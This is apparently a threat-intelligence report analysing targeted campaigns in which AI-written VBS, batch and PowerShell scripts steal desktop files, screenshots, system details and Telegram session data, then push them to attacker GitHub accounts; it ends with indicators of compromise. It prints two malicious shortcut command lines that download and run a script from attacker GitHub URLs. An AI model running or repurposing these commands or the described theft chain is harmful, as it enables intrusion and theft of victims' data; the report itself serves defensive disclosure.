While researching malware used by attacker groups, we came across a series of unusual attacks that used GitHub repositories to store malicious files and victim data. These campaigns appear targeted rather than large-scale, and it seems the attackers relied heavily on AI during development. The earliest activity we traced was in September 2024, and the most recent in April 2025.

Our Threat Intelligence team investigates complex attacks featuring novel persistence and data collection methods and unique infrastructures. Sometimes we find simple two-line scripts, and other times we run into "bombs" that trigger dozens of different payloads at once. But it's pretty rare for us to come across such long chains of really simple AI-written scripts that still work, tied together in a way that clearly wasn't random. Think of this as an APT-style attack implemented at the "script kiddie" level (a derogatory term in hacker culture for those who rely on scripts or programs written by others).

How it started

While working on one of our tasks, we stumbled across a suspicious file with a similar name and a double extension, which immediately caught our attention:

document.docx.lnk SHA-256: 6bea2d17c26ffc7cec6d6e9c7d8548c5d8ce75e5523bfc7f3bfcde4f055848ff

We were particularly interested in a command that downloaded the hidden.vbs file from GitHub and started a legitimate PDF file retrieved from the Cayman Islands online library.

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/jacker8181/fff/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://cnslibrary.com/wp-content/uploads/2024-2026-SPS.pdf

The script referenced a GitHub user jacker8181, who has two repositories: fff and tune:

Figure 1. GitHub account jacker8181
Figure 1. GitHub account jacker8181

The fff repository contains two files:

  • hidden.vbs SHA-256: eee0cca526348c2bf393574df418e43ca192671458a4d4d0d5d8d09206ad7757

  • unp.bat SHA-256: 2e7bd3ac84f3e4014274ec418f6d0467748b8fcbe858c50bdaf84becf97da023

At this stage, hidden.vbs already stands out because of its coding style—there are comments for each function and an overall layout that strongly suggests it was produced using AI prompts:

Figure 2. Contents of hidden.vbs
Figure 2. Contents of hidden.vbs

This script downloaded a ZIP archive from filebin.net, and then another script, unp.bat, unpacked that archive and started the next file in the chain—git_v.vbs:

Figure 3. Contents of git_v.vbs
Figure 3. Contents of git_v.vbs

The tune repository contained a folder with Telegram data (tdata) and files apparently related to the victim's system, such as system_unfo.txt:

Figure 4. Contents of system_unfo.txt
Figure 4. Contents of system_unfo.txt

In this case, the tune folder did have files, but they were all empty (0 KB), and the system files don't give us enough to identify the victim.

Nonetheless, we started collecting data on these incidents and proceeded to analyze the entire chain.

Full attack chain

We were unable to identify the initial attack vector, but it looks like the attacks started with emails containing malicious ZIP or RAR attachments. As an example, let's take the file document.zip SHA-256: d83eb2bc85d29d8fe7bcfb1383de3643fcf8f5523ccf02167de1bcc298aa14fd

The attack chains are quite long and convoluted. Here's a visual representation:

Figure 5. Attack chain diagram
Figure 5. Attack chain diagram

The archive contains fille_docu.lnk SHA-256: 08f6cb6d682c9fc9ea895f4bd71ada780a66882aa7330137be6f17fae755eb4a with the following script:

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/Allsafetui/lex/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://career.habr.com/olya-yurievna.pdf"%systemroot%\system32\imageres.dll

The attacker tried to use a resume from career.habr as bait, but it's highly unlikely that the referenced PDF actually existed at that path.

This GitHub account no longer contains any repositories:

Figure 6. GitHub account Allsafetui
Figure 6. GitHub account Allsafetui

Since hidden.vbs was downloaded from GitHub and there are no files in the Allsafetui account now, it's impossible to retrieve the exact file that was used. However, we found two files related to this repository:

  • hidden.vbs SHA-256: 2b2dc11a9adbc40813b6290a4b117f37ab940c3baebedf19948ba5b7935ab754

  • hidden.vbs SHA-256: 658c9f9f6f695c4295db4552326fec1daac621f1fcba63b52ff0c704885f1473

The functionality of both files is identical to that of hidden.vbs; the only difference is the links to Best_Gits.zip:

hidden.vbs downloads unp.bat, which unpacks Best_Gits.zip 11d11058d955a03d2fc7270c2968b35867903f4f11b0e23c0aa56655a28df4b8 into a temporary folder and executes the first script, git_v.vbs:

Figure 7. Contents of git_v.vbs
Figure 7. Contents of git_v.vbs

The Best_Gits.zip folder has the following structure:

Figure 8. Structure of the extracted Best_Gits folder
Figure 8. Structure of the extracted Best_Gits folder

git_v.vbs runs git.cmd in a hidden window:

Figure 9. Contents of git.cmd
Figure 9. Contents of git.cmd

git.cmd immediately runs hidden_runs.vbs, waits five minutes, runs t.vbs, waits another ten minutes, and then pushes the contents of the LO folder to the GitHub repository.

Let's examine hidden_runs.vbs up to the TIMEOUT command. This script is a wrapper that runs three other scripts:

Figure 10. Contents of hidden_runs.vbs
Figure 10. Contents of hidden_runs.vbs

  1. The first script is password_grab.cmd. This script searches the user's desktop for files by name and saves them to LO/info_desktop. It was most likely generated using a sophisticated AI prompt, something like "create a script that steals passwords":

    Figure 11. Contents of password_grab.cmd
    Figure 11. Contents of password_grab.cmd

  2. screenshot.cmd runs screen.ps1 in a hidden window using PowerShell, and screen.ps1 collects data. The comments added by AI conveniently explain the functionality:

    Figure 12. Contents of screenshot.cmd
    Figure 12. Contents of screenshot.cmd
    Figure 13. Contents of screen.ps1
    Figure 13. Contents of screen.ps1

  3. The third script is also thoroughly commented. It collects system data and saves it to system_info.txt:

    Figure 14. Contents of system.bat
    Figure 14. Contents of system.bat

As mentioned earlier, t.vbs was executed five minutes after git.cmd. The script stopped the Telegram process and copied Telegram data (tdata) to LO/tdata:

Figure 15. Contents of t.vbs
Figure 15. Contents of t.vbs

After another 10-minute wait—by which time the scripts should have collected the data—the files were pushed to https://github.com/Allsafetui using libraries and a modified git.exe version, authenticating with a personal access token and with SSL certificate verification disabled.

The archive also contained a file called screenshot_hiden.cmd, but this file wasn't used anywhere and was basically a duplicate of the regular screenshot.cmd file, only without the "hidden" function (yet it has "hidden" in the name):

Figure 16. Contents of screenshot_hiden.cmd
Figure 16. Contents of screenshot_hiden.cmd

Other accounts

In the jacker8181 account, we found data collected from the victim's computer, but the files did not contain sensitive information and, judging by their names, looked like the output of a run in a sandbox environment. We also found a few other attacker accounts, but most of them have been deleted. One account was still active and contained the following files:

Figure 17. GitHub account jockop77
Figure 17. GitHub account jockop77

This is the earliest account we located. Based on the commits, it was still active in September 2024.

The account contained three repositories:

1) - contains a readme.md file with a single "-" character.

2) fff contains hidden.vbs and unp.bat.

3) tet contains a text file called t.txt.

t.txt contains a message demanding $50,000 to be delivered to an old library on a Friday night and looks completely out of place in the overall context:

Figure 18. Contents of t.txt
Figure 18. Contents of t.txt

The attacker uploaded hidden.vbs and unp.bat on September 16, 2024, at 16:17:28 using the email address danatolevic544@gmail.com. At 16:18:13, a file (likely a test file, which also appears in git.cmd) was uploaded by myemail@example.com:

Figure 19. Possible test commit by the attacker
Figure 19. Possible test commit by the attacker

We found six accounts in total, although the actual number may be higher because about half have already been deleted. In every case we examined, the code created a data folder and pushed it to a GitHub account, suggesting these were likely targeted attacks rather than mass campaigns. The pattern appears to be "one account—one victim," unless the attackers had an automated workflow that notified them of new commits and automatically retrieved files before cleaning up.

However, judging by the jacker8181 account, which still has the tune repository, it's unlikely that such an automation was implemented.

GitHub account

Status

https://github.com/Allsafetui

Active, no files

https://github.com/jacker8181

Active

https://github.com/jockop77

Active

https://github.com/stomy707

Inactive

https://github.com/mike22244

Inactive

https://github.com/jocki70

Inactive 

IOCs

hidden.vbs:

2b2dc11a9adbc40813b6290a4b117f37ab940c3baebedf19948ba5b7935ab754

658c9f9f6f695c4295db4552326fec1daac621f1fcba63b52ff0c704885f1473

c443829a81bcf8565686c6395f1eddedecac4175b97d77678907c8b1453c70e3

231d60a57386b26c7ac96124adf357646731b7338874c62f5e3af7950da87e28

2b8bcbefb5876395958160a6f831e660f212865aac124f275977995cc8e5d7a4

04a459443bd8015089afd946ea088a0cf6141a9c7f28a954c1fd27826cf95422

eee0cca526348c2bf393574df418e43ca192671458a4d4d0d5d8d09206ad7757

8c747c1319dc5564b15ddb0ba913f347ab22fbb5bbbc3ee88f99096245f87ea0

Best_Gits.zip

b3315bfa572827aae2b4c1ce658617514081fae0d7731d0861ea8bee974db1ca

eb2e455ceadbbb28dd09fa966bb7268fa817f2a749af899811017ce3964b8a74

11d11058d955a03d2fc7270c2968b35867903f4f11b0e23c0aa56655a28df4b8

047f0735b7ec7f9666e0430b7aaf578bedeff555c3fa286e4bf11bf9afcfeaee

b3576ffd3d5db8f5fc095e010a1cfe13a7065d90f336a0be6f63b2a141a75114

564ca80990e27c4e1d881835b4a051a813f29874eeca942c5f278031531c4b19

Other files

b.rar

51ec727fabb6ffc26a6100a56da6919a4f869076deb1ecfbfa85eb5b5cc32bdb

unp.bat

6f4b22f593af20b1bae21370efebed2699d407b139befa546d982c7c2fbef9b0

unp.bat

2e7bd3ac84f3e4014274ec418f6d0467748b8fcbe858c50bdaf84becf97da023

f_62167fba570ac718.zip

9e936bacfb2e22658c1cc77fbef583a3bbc36599608949f0850a69505894d3db

document.zip

d83eb2bc85d29d8fe7bcfb1383de3643fcf8f5523ccf02167de1bcc298aa14fd

payload_1.zip

c0c04d2e43ba6910bae4b0aaa2ebdc7069a365ff9a75aa98b4c5342161d45e87

doc390234.zip

3f4f86fac8e2c040c138b6d2a14cf6856b83951415df1bffcd2be2ac596af572

code.zip

45fc1fadc5a0c5e34f68e8822128fca3f1dcb8c5e040625287b503e021f22366

document.docx.lnk

6bea2d17c26ffc7cec6d6e9c7d8548c5d8ce75e5523bfc7f3bfcde4f055848ff

document.docx.lnk

5a3da63fa0d00f9409ab6feeafd7638b35039e0543d511785c5fb36fcfae20cb

telegram bot code.lnk

b7fe85a96eb2c4d079f9f0070d623e2e9278abd41c62f2582500e91b58403409

codepen.lnk

c9175e179e86a5f653373c540ac8663a741f26e693268d3080586291b1f44c43

codepen.txt.lnk

34c594b8a5920cbe9a8758ad196b0ef1b837fa4135f6e7324ad8e8b6c68b45c0

doc_237943_.lnk

268e5e051ae4866ca72055c9b6f10fdd6e68eb247b61ce987a219c2324dc5179

fille_docu.lnk

08f6cb6d682c9fc9ea895f4bd71ada780a66882aa7330137be6f17fae755eb4a

doc_237943_.lnk

f73a1fb7d2b44ebc0136cfdd6a70db7b948c7ccfa6f234dca56237c5b0a6c03a

doc390234.pdf.ln

7672312e3df69bccf57d0ac595920cd4e9d3dc14e70532c39a367b4bd205d339

Alexander Badaev

Information security threat researcher, Positive Technologies Expert Security Center